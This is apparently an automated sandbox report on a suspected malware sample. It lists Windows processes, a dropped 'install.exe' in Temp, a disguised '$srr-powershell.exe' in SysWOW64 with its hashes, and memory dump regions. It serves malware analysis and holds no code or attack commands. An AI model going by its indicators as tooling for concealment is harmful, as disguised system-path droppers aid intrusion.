C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2ac,0x7ffadb592e98,0x7ffadb592ea4,0x7ffadb592eb02⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2376 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4156 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:82⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
9KB
MD5b5b727bd7aa28bf392145fcc332f240e
SHA1069a52e538f0c703657490a18f967d94c5744276
SHA2566cccace7dbdb020385c2433d6e301fd06115077f9e41c22719bcbec18bbdac57
SHA512e2a2b60bd1e34fea11e7b7ca3b637369a46eef63f79321672420658f4236aba6d27a56e035eefd1b1a40288b7f9b89713036ad67f4a6c88154b5a60a89e57f62
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Windows\SysWOW64\Windows\$srr-powershell.exeFilesize
409KB
MD5ca46bdb39ae5def0cbcb622d2daf18ee
SHA1e4fade184792a622eecbb60e6e10affd9b1f9625
SHA256ffb2649845e8ebbf318b01537f3bf87fa2f3ae48a0cc5109985abbfa7e2d4bce
SHA51201d8ad45700c3a24a48806256a571e239f3d76c58820a9dfbea0d5a8429e0abd965e1ce16e5e8fc275b8b9769be44a987ed3caac7da313729221ec43c073ee0c
-
C:\Windows\Temp\__PSScriptPolicyTest_eyeiv3ui.osv.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/612-49-0x00000245BDA40000-0x00000245BDA6B000-memory.dmpFilesize
172KB
-
memory/612-50-0x00000245BDA40000-0x00000245BDA6B000-memory.dmpFilesize
172KB
-
memory/612-56-0x00000245BDA40000-0x00000245BDA6B000-memory.dmpFilesize
172KB
-
memory/612-57-0x00007FFAC3530000-0x00007FFAC3540000-memory.dmpFilesize
64KB
-
memory/612-48-0x00000245BDA10000-0x00000245BDA35000-memory.dmpFilesize
148KB
-
memory/668-67-0x00000265E8EA0000-0x00000265E8ECB000-memory.dmpFilesize
172KB
-
memory/668-68-0x00007FFAC3530000-0x00007FFAC3540000-memory.dmpFilesize
64KB
-
memory/668-61-0x00000265E8EA0000-0x00000265E8ECB000-memory.dmpFilesize
172KB
-
memory/764-24-0x0000021806360000-0x0000021806382000-memory.dmpFilesize
136KB
-
memory/764-34-0x000002181EB40000-0x000002181EB6A000-memory.dmpFilesize
168KB
-
memory/764-36-0x00007FFB02100000-0x00007FFB021BE000-memory.dmpFilesize
760KB
-
memory/764-35-0x00007FFB034B0000-0x00007FFB036A5000-memory.dmpFilesize
2.0MB
-
memory/940-72-0x000002B397BA0000-0x000002B397BCB000-memory.dmpFilesize
172KB
-
memory/940-79-0x00007FFAC3530000-0x00007FFAC3540000-memory.dmpFilesize
64KB
-
memory/940-78-0x000002B397BA0000-0x000002B397BCB000-memory.dmpFilesize
172KB
-
memory/1016-83-0x0000024501AF0000-0x0000024501B1B000-memory.dmpFilesize
172KB
-
memory/1016-90-0x00007FFAC3530000-0x00007FFAC3540000-memory.dmpFilesize
64KB
-
memory/1016-89-0x0000024501AF0000-0x0000024501B1B000-memory.dmpFilesize
172KB
-
memory/1044-94-0x0000016B704D0000-0x0000016B704FB000-memory.dmpFilesize
172KB
-
memory/1060-40-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1060-37-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1060-42-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1060-44-0x00007FFB02100000-0x00007FFB021BE000-memory.dmpFilesize
760KB
-
memory/1060-43-0x00007FFB034B0000-0x00007FFB036A5000-memory.dmpFilesize
2.0MB
-
memory/1060-45-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1060-39-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1060-38-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2196-16-0x0000000075280000-0x0000000075A30000-memory.dmpFilesize
7.7MB
-
memory/2196-33-0x0000000006200000-0x000000000620A000-memory.dmpFilesize
40KB
-
memory/2196-744-0x0000000075280000-0x0000000075A30000-memory.dmpFilesize
7.7MB
-
memory/2196-743-0x0000000075280000-0x0000000075A30000-memory.dmpFilesize
7.7MB
-
memory/2196-15-0x0000000075280000-0x0000000075A30000-memory.dmpFilesize
7.7MB
-
memory/4580-7-0x0000000006630000-0x0000000006642000-memory.dmpFilesize
72KB
-
memory/4580-8-0x0000000006A70000-0x0000000006AAC000-memory.dmpFilesize
240KB
-
memory/4580-14-0x0000000075280000-0x0000000075A30000-memory.dmpFilesize
7.7MB
-
memory/4580-6-0x0000000005A60000-0x0000000005AC6000-memory.dmpFilesize
408KB
-
memory/4580-5-0x0000000075280000-0x0000000075A30000-memory.dmpFilesize
7.7MB
-
memory/4580-4-0x00000000055A0000-0x0000000005632000-memory.dmpFilesize
584KB
-
memory/4580-3-0x0000000005B50000-0x00000000060F4000-memory.dmpFilesize
5.6MB
-
memory/4580-2-0x000000007528E000-0x000000007528F000-memory.dmpFilesize
4KB
-
memory/4580-0-0x000000007528E000-0x000000007528F000-memory.dmpFilesize
4KB
-
memory/4580-22-0x0000000075280000-0x0000000075A30000-memory.dmpFilesize
7.7MB
-
memory/4580-1-0x0000000000AB0000-0x0000000000B1C000-memory.dmpFilesize
432KB